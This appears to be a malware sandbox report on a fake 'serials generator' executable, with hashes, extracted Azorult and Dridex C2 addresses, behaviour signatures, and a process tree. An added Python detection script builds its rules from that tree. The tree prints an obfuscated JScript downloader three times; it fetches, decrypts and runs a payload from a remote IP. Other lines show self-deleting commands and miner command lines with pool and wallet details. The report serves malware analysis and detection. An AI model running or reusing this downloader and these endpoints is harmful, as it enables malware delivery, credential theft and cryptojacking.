Analysis

  • max time kernel
    1791s
  • max time network
    1801s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    03-04-2021 06:43

General

  • Target

    My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe

  • Size

    5.4MB

  • MD5

    71e1b5c96e0b450768b799f4f2ba8c6a

  • SHA1

    d974040a5020d4132094f04d42edfb24c28b3c1a

  • SHA256

    16bd29c401eabb1c1d158f615fab03d81d6db786d936c4f3d3f929a16162d1c2

  • SHA512

    96009bbccfedc418a4ed8a02d19e9c42f90eb6f9827ae0da554e1d8d4a8eb89255e0434eaec0ebf2b72967b52fb604845c85819bf7ccc82ef912edb8dd8cbdfc

Malware Config

  • Extracted
    Family
      azorult
    C2
      http://kvaka.li/1210776429.php

  • Extracted
    Family
      dridex
    Botnet
      10111
    C2
      210.65.244.183:8443
      216.10.251.121:6601
    rc4.plain
    rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal (DCRat) is a .NET RAT, active since June 2019, that can load additional plugins.

  • Detected facebook phishing page
  • Dridex

    Dridex (also known as Bugat/Cridex) is a banking trojan that specializes in stealing banking credentials.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Dridex Loader 2 IoCs

    Detects the Dridex x86 and x64 loaders in memory.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 38 IoCs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Drive enumeration is common in ransomware, which needs a list of volumes to encrypt, but on its own it is not conclusive; no encryption activity is reported in this run.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
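The following is an added example, not code from the sandbox or this report. It turns several of the signatures above (Delays execution with timeout.exe, Runs ping.exe, Kills process with taskkill, Blocklisted process makes network request, XMRig Miner Payload) into command-line rules and runs them over records copied from the process tree below. The `Proc` record, the rule names, the regexes and the `SYSTEM_DIRS` list are this example's own choices; the PIDs, image paths and command lines in `SAMPLE_PROCS` are taken from the tree (one long URL query string shortened).

```python
"""Command-line rules for behaviours seen in this report's process tree.

Added example; rule names and patterns are assumptions of this example,
the sample records are copied from the report's process tree.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str


# ping/timeout used as a sleep before the launcher deletes its own file
SELF_DELETE = re.compile(
    r"\b(?:ping\b[^&]*-n\s+\d+|timeout\s+/t\s+\d+)[^&]*&\s*del\b", re.I)
# wscript in batch mode with an engine override on a file that is not .js/.vbs
ENGINE_OVERRIDE = re.compile(r"\bwscript\b.*?//E:\w+\s+\S+\.tmp\b", re.I)
# miner-style arguments: stratum pool URL, XMRig thread hint, or -o pool -u wallet
MINER_ARGS = re.compile(
    r"stratum\d*\+(?:ssl|tcp)://|--cpu-max-threads-hint|(?:^|\s)-o\s+\S+:\d+\s+-u\s", re.I)
BROWSER_KILL = re.compile(
    r"\btaskkill\b.*?/im\s+(?:chrome|firefox|iexplore|msedge)\.exe", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def detect(p: Proc) -> list:
    """Return the rule names that fire for one process record."""
    hits = []
    if SELF_DELETE.search(p.cmdline):
        hits.append("delayed_self_delete")
    if ENGINE_OVERRIDE.search(p.cmdline):
        hits.append("wscript_engine_override")
    # A Microsoft system binary carrying a miner's command line: the image on
    # disk is msiexec.exe but the code running is not (the parent DE12.tmp.exe
    # showing SetThreadContext in the tree is the process-hollowing tell).
    if p.image.lower().startswith(SYSTEM_DIRS) and MINER_ARGS.search(p.cmdline):
        hits.append("system_binary_mining_args")
    if BROWSER_KILL.search(p.cmdline):
        hits.append("browser_kill")
    return hits


def scan(procs) -> dict:
    """Map pid -> fired rules, omitting processes with no hits."""
    out = {}
    for p in procs:
        hits = detect(p)
        if hits:
            out[p.pid] = hits
    return out


# Records copied from the process tree (benign-looking siblings included so
# the rules are shown not firing on them).
SAMPLE_PROCS = [
    Proc(1448, r"C:\Windows\SysWOW64\cmd.exe",
         r'cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"'),
    Proc(1656, r"C:\Windows\SysWOW64\PING.EXE", "ping 1.1.1.1 -n 1 -w 3000"),
    Proc(2148, r"C:\Windows\SysWOW64\cmd.exe",
         r"/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe"),
    Proc(2892, r"C:\Windows\SysWOW64\wscript.exe",
         'wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTgyNTc2&bxQynoOuX" "2"'),
    Proc(2192, r"C:\Windows\SysWOW64\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"'),
    Proc(2800, r"C:\Windows\system32\msiexec.exe",
         "-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999"),
    Proc(2880, r"C:\Windows\system32\msiexec.exe",
         "-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999"),
    Proc(400, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /f /im chrome.exe"),
]

if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_PROCS).items():
        print(pid, ", ".join(rules))
```

The image-path check in `system_binary_mining_args` is what separates a hollowed `msiexec.exe` from a miner dropped under a user profile; the latter is still worth a rule, but it is a different one. `ping.exe` on its own (PID 1656) does not fire: the rule wants the delay and the `del` in the same `cmd.exe` command line, which is the self-deletion pattern rather than a lone ping.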

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:872
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2416
    • C:\Users\Admin\AppData\Local\Temp\My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
      "C:\Users\Admin\AppData\Local\Temp\My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1232
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              5⤵
                PID:1028
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
            keygen-step-1.exe
            3⤵
            • Executes dropped EXE
            PID:676
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
            keygen-step-3.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:368
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1448
              • C:\Windows\SysWOW64\PING.EXE
                ping 1.1.1.1 -n 1 -w 3000
                5⤵
                • Runs ping.exe
                PID:1656
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
            keygen-step-4.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1724
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
              4⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1344
              • C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                5⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                PID:1352
                • C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe
                  "C:\Users\Admin\AppData\Local\Temp\QI51EB4ETU\multitimer.exe" 1 101
                  6⤵
                  • Executes dropped EXE
                  PID:1964
              • C:\Users\Admin\AppData\Local\Temp\W8KANHW09S\setups.exe
                "C:\Users\Admin\AppData\Local\Temp\W8KANHW09S\setups.exe" ll
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1236
                • C:\Users\Admin\AppData\Local\Temp\is-V3J1J.tmp\setups.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-V3J1J.tmp\setups.tmp" /SL5="$201B2,635399,250368,C:\Users\Admin\AppData\Local\Temp\W8KANHW09S\setups.exe" ll
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1620
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                    7⤵
                    • Modifies Internet Explorer Phishing Filter
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:884
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275457 /prefetch:2
                      8⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:1824
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTgyNTc2&bxQynoOuX&oa1n4=xH3QMrXYbRvFFYbfLf_KRqZbNU&s2ht4=zRGUKVxo2bk63PE5qpZDLGpbD1DB6gqV6AH16-t_d0erFOfQe5zUGwcgFin41eB1kXpar9iUWBzBKcgJTUqxHcMgkUqZGSQrU_ilmnx7IcIc9xlhLX4GVS_O4eVlkgvA5Tn6r7&IiiyhaaQNTA0NQ==" "2"
                        9⤵
                          PID:2840
                          • C:\Windows\SysWOW64\wscript.exe
                            wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTgyNTc2&bxQynoOuX&oa1n4=xH3QMrXYbRvFFYbfLf_KRqZbNU&s2ht4=zRGUKVxo2bk63PE5qpZDLGpbD1DB6gqV6AH16-t_d0erFOfQe5zUGwcgFin41eB1kXpar9iUWBzBKcgJTUqxHcMgkUqZGSQrU_ilmnx7IcIc9xlhLX4GVS_O4eVlkgvA5Tn6r7&IiiyhaaQNTA0NQ==" "2"
                            10⤵
                            • Blocklisted process makes network request
                            PID:2892
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c gg3fs.exe
                              11⤵
                              • Loads dropped DLL
                              PID:1820
                              • C:\Users\Admin\AppData\Local\Temp\gg3fs.exe
                                gg3fs.exe
                                12⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:2124
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275483 /prefetch:2
                        8⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1616
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTU0NTAx&ukob&s2ht4=YmKrSCJ2vfzSj2bCIEBjw8V7dTjvSgfdOLq1UbgC-jgeDLgYOmMxZC15E87etzkKNylafsJOG_h2JMglH_JeRR7I421n2nbIQc5kjzxLU7TRUye4dVlMU5g4Vn_3PEqLKrhF0B0Y0UgvKeZ0ipRvGUyTpNTlwsfOzRD9xq-2T9bdwn5Qd&oa1n4=x33QdfWfaRyPDojEM__dTaRGP0vYGViPxY2&NakntWFNTc3MA==" "2"
                          9⤵
                            PID:3124
                            • C:\Windows\SysWOW64\wscript.exe
                              wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?MTU0NTAx&ukob&s2ht4=YmKrSCJ2vfzSj2bCIEBjw8V7dTjvSgfdOLq1UbgC-jgeDLgYOmMxZC15E87etzkKNylafsJOG_h2JMglH_JeRR7I421n2nbIQc5kjzxLU7TRUye4dVlMU5g4Vn_3PEqLKrhF0B0Y0UgvKeZ0ipRvGUyTpNTlwsfOzRD9xq-2T9bdwn5Qd&oa1n4=x33QdfWfaRyPDojEM__dTaRGP0vYGViPxY2&NakntWFNTc3MA==" "2"
                              10⤵
                              • Blocklisted process makes network request
                              PID:3152
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c z5cw6.exe
                                11⤵
                                  PID:3224
                                  • C:\Users\Admin\AppData\Local\Temp\z5cw6.exe
                                    z5cw6.exe
                                    12⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:3260
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:668701 /prefetch:2
                            8⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2664
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NDk2NTI3&HJKuULkm&s2ht4=vRGUWVxo2bk63PE5qpZDLGpbf1DBmgqVmAH16-t_d0erZOfQe5zUGweQFpzY1dUVkUoqqm30LUyRXOiZTX_BaFZwlB-ZaWF7I-jlmmnbJAJM9xlBWBv2JY_O4ZUVkgvA5Tn6r7&oa1n4=xHrQMrXYbRzFFYbfLf_KRqZbNU&UTkPdFMjEyNw==" "2""
                              9⤵
                                PID:2788
                                • C:\Windows\SysWOW64\wscript.exe
                                  wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.24.76/?NDk2NTI3&HJKuULkm&s2ht4=vRGUWVxo2bk63PE5qpZDLGpbf1DBmgqVmAH16-t_d0erZOfQe5zUGweQFpzY1dUVkUoqqm30LUyRXOiZTX_BaFZwlB-ZaWF7I-jlmmnbJAJM9xlBWBv2JY_O4ZUVkgvA5Tn6r7&oa1n4=xHrQMrXYbRzFFYbfLf_KRqZbNU&UTkPdFMjEyNw==" "2""
                                  10⤵
                                  • Blocklisted process makes network request
                                  PID:2232
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c h9zmt.exe
                                    11⤵
                                    • Loads dropped DLL
                                    PID:1564
                                    • C:\Users\Admin\AppData\Local\Temp\h9zmt.exe
                                      h9zmt.exe
                                      12⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:2972
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:406557 /prefetch:2
                              8⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:2832
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:799805 /prefetch:2
                              8⤵
                              • Modifies Internet Explorer settings
                              • Suspicious behavior: GetForegroundWindowSpam
                              • Suspicious use of SetWindowsHookEx
                              PID:1864
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IK0XRGX9\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.exe
                              "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IK0XRGX9\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1016
                              • C:\Users\Admin\AppData\Local\Temp\is-U7GON.tmp\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-U7GON.tmp\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.tmp" /SL5="$30370,61608034,798208,C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IK0XRGX9\setup-istripper_85sUOBRtRlrYeD9ZIGp3Q1yjWnSD2.exe"
                                9⤵
                                • Executes dropped EXE
                                • Drops startup file
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                PID:2340
                                • C:\Users\Admin\AppData\Local\vghd\bin\vghd.exe
                                  "C:\Users\Admin\AppData\Local\vghd\bin\vghd.exe" -fromSetup
                                  10⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2544
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=5030865361025916311 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=5030865361025916311 --renderer-client-id=3 --mojo-platform-channel-handle=1772 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:1860
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=12539584626415556446 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=12539584626415556446 --renderer-client-id=2 --mojo-platform-channel-handle=1752 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2216
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=8618911601537566506 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=8618911601537566506 --renderer-client-id=4 --mojo-platform-channel-handle=1804 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2352
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=13868008317195459732 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=13868008317195459732 --renderer-client-id=5 --mojo-platform-channel-handle=1816 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2264
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=10744385650040740973 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=10744385650040740973 --renderer-client-id=6 --mojo-platform-channel-handle=1828 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2392
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=1401645925065305749 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=1401645925065305749 --renderer-client-id=7 --mojo-platform-channel-handle=1840 /prefetch:1
